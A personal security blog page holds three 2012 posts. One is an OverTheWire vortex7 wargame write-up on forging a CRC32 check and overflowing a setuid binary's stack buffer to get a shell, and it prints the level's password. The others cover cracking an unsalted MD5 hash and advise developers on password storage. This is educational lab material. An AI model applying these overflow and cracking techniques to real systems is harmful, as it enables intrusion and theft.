blog.ant0i.net - my little techie blog: cryptography

Showing posts with label cryptography. Show all posts

Wednesday, September 26, 2012

vortex7

About a year ago I stumbled upon the Over The Wire hacker challenges and started solving the first set of levels (called vortex). Since then, I have been publishing my solutions in my blog. Here is vortex level 7:

The code

int main(int argc, char **argv)
{
        char buf[58];
        u_int32_t hi;
        if((hi = crc32(0, argv[1], strlen(argv[1]))) == 0xe1ca95ee) {
                strcpy(buf, argv[1]);
        } else {
                printf("0x%08x\n", hi);
        }
}

The vulnerability exposed in this code is a basic buffer overflow with two subtleties:

The CRC of the buffer must equate to a given value (0xe1ca95ee)
The buffer is rather small (58 bytes)

Manipulating the checksum

The cyclic redundancy check (CRC) computes a check value (or checksum), which is used to detect accidental changes in data, e.g. when transmitting over unreliable communication channels. With this error detecting code, the slightest change (i.e. bit-flip) in the input data results in a very different output pattern. As opposed to cryptographic hash functions like SHA1 or MD5, preimage resistance is not a property of CRC, it is not designed to withstand preimage attacks: given a checksum C, it is not hard to find an input m such that CRC(m) = C. As such, one shouldn't rely on it for integrity checks over insecure channels since it is very easy to manipulate it as is shown in the solution.

To solve this level, I chose to apply the CRC-reversing algorithm described in Reversing CRC – Theory and Practice, which by the way also contains a very nice introduction to CRC. The method consists in appending a 32-bit pattern to the buffer in order to adjust the CRC-remainder to the desired checksum. The same principle is proposed in the suggested lecture, CRC and how to Reverse it. But as opposed to the first approach which uses the inverse of the divisor polynomial, the bit pattern is derived using a system of equations.

Overflowing the buffer

This level contains a classic vulnerability which can easily be exploited to execute arbitrary code: a buffer overflow. The use of the strcpy standard library function to copy a buffer of data to another completely disregards the destination's capacity. If the source buffer is larger than the destination, all bytes will be copied, even though the destination's bound has been exceeded, and in doing so, subsequent structures in memory will be destroyed.

Intercepting the instruction pointer

Depending where the destination buffer is located in the process memory, it may be possible for an attacker to take influence on the program execution flow. In this case, the destination buffer is on the stack. By overflowing the buffer, copying bytes past its bound, the stored eip value will be overwritten. This is a pointer to the next instruction to return to after leaving the current stack frame, i.e. when returning from the current function call. With a meaningful value, it is possible to redirect the execution of the program to any executable location in memory.

Creating a shellcode

The payload we want to execute consists in a small fragment of x86 machine instructions, which perform 2-3 syscalls that allow us to run a shell:

geteuid()/setreuid() are used to set the effective user-id. The exploited binary runs with the suid-bit, which means the process is executed in the name of the file owner (the user that has read-privileges for the next level's password file).
execve() is called to run /bin/bash.

The original x86/asm code can be found here. Check out the Makefile to see how it is compiled and the raw instruction data is extracted. It is then necessary to encode the data to avoid specific patterns such as \0 bytes. I used metasploit's msfencode tool for this.

Executing arbitrary code

Since the buffer is rather small (58 bytes), it is difficult to dissimulate the malicious payload. An alternative way to include arbitrary data into the process memory is to define an evironment variable containing the data. It will be accessible from the beginning of the stack. The buffer must then overflow the saved eip value to point at the corresponding region in memory. Unfortunately, this address cannot be precisely deduced. Therefore, a common strategy consists in prepending a large number of nop instructions before the shellcode. This extends the landing platform of the target address thus increasing the probability of hitting the shellcode.

The exploit

The finalized exploit is available here. It is a C wrapper which prepares a shellcode and the buffer contents and calls the binary to exploit. I employed following methods from SAR-PR-2006-05 to implement the table driven CRC32 algorithm:

make_crc_table()
crc32_tabledriven()
fix_crc_end()

Since at first the resulting checksum values did not match the ones generated by vortex7 I additionally extracted the CRC32 table from the binary and stored them in crc_table_static. I realized that the vortex7 implementation actually uses 0x00000000 instead of 0xFFFFFFFF for INITXOR and FINALXOR.

The fix_crc_end() function adjusts the buffer such that its checksum eventually results in the desired value 0xe1ca95ee.

make_buffer() creates the data used to overflow the buffer. It contains a repetitive sequence of the target address. It allows to shift the sequence bytewise in order to adjust its alignment. make_payload() generates the buffer which contains the nop sled and the shellcode.

Finally, the wrapper executes vortex7, passing the address buffer as a command line argument and the payload in the environment variables.

The program expects two arguments:

An offset for the target address, relative to the environment pointer taken from the current process (the wrapper).
An alignment index (0-4) used to align the target address in the buffer.

Following arguments worked for me:

$ ./v7_wrapper 0 2
Using address: 0xFFFFD91F
$ whoami
vortex8

The password for the next level is then retrieved from the password file for the next level:

$ cat /etc/vortex_pass/vortex8 
X70A_gcgl

That's it! If you want to learn more about buffer overflows, I suggest you read Smashing the Stack for Fun and Profit by aleph1, originally posted in Phrack Magazine. Also have a look at my blog where I regularily publish vortex level solutions: blog.ant0i.net

Wednesday, July 18, 2012

vortex5

Vortex level 5 consists in cracking a password hashed with MD5, which is called a preimage attack. No salt was used when applying the hash function, this makes it very easy by today's means to find the originating value.

The fastest way I found to achieve this is searching for the hash value with Google. Of course this will return lots of references to this level's solution, but you'll also get results for some websites that publish datasets of precomputed hashes, like for example md5crack or md5this.

Alternatively, you could crack the MD5 hash using some tool such as John The Ripper to perform a brute force attack. In the worst case this could result in computing all 62^5 combinations of the password (it was specified to be 5 characters long and consisting of a-zA-Z0-9). To restrict the number of tries, you can provide a wordlist of plausible passwords. Obviously, this will only generate a result if the password already existed in the list. This method works best when using real password data (e.g. from a leaked password database), since people tend to use similar patterns and also reuse their passwords.

Other tools such as RainbowCrack perform the attack using a rainbow table: a data structure used for the efficient storage of precomputed hash values. As for the websites mentioned above, you can easily get ahold of various tables, ranging from 50 to 500GB depending on the space of hashed values.

Sunday, March 4, 2012

Password Security 101 for Web Developers

Passwords are still the only mean of authentication for I'd say 99.95% of all online services including social networking sites, online shops and even e-banking applications. When you think about the consequences of a password theft, say for your personal email account, you'll soon realize that a password such as 123456, iloveyou or your mom's birthdate is totally insufficient... (see this and change your password everywhere if you get a match).

There a lots of articles that will tell you what a (more) secure password looks like (I especially like this one as well as it's illustration). And although many web sites will impose some password policy during registration that will reject any password unless it contains some digit or special characters, the choice (and the complexity) is ultimately left to the user. What's unavoidable is that users are almost certainly going to reuse at least one password sometime for one or the other online service. Haven't you also? (don't blush).

So what can you as a developer do about it? I don't know, but I can tell you what you should totally avoid if you don't want yourself and your company to be looked at as total newbs.

First realize that passwords are the user's good and you are due to treat that information with absolute care. Every single one of your clients has spent the effort of selecting some unnatural string, repeating the process until it complied with your password policy and spending the rest of the day trying not to forget it. This is the reason why user's will eventually reuse a password. So bear in mind, that you're not storing a user's password for your web application only, but most probably also for a number of other services the user has registered to. Respecting your client's integrity means that you will never disclose that data, not even internally within your company.

The most important precaution you should take when dealing with password data is: never ever store passwords in clear text. No system is safe enough, not even yours. And the risk's not worth it. If you don't know how to avoid storing passwords in clear text, learn about hash functions and salting.

Second rule: never ever send a password back to the user (for instance via email). This is totally unprofessional. You're not only showing your client that you're storing passwords in clear text (i.e. that you're a newb), you're also compromising his password by sending it over an unsecure channel.

I assume companies do this to reduce support cases related to lost passwords. They should rethink it all over. Recent attacks have shown how much damage is caused to the company (reputation) as well as to their clients by having confidential user data stolen. Think about RSA, the Sony Playstation network or recently Youporn (should you not know, the most popular pornographic website)...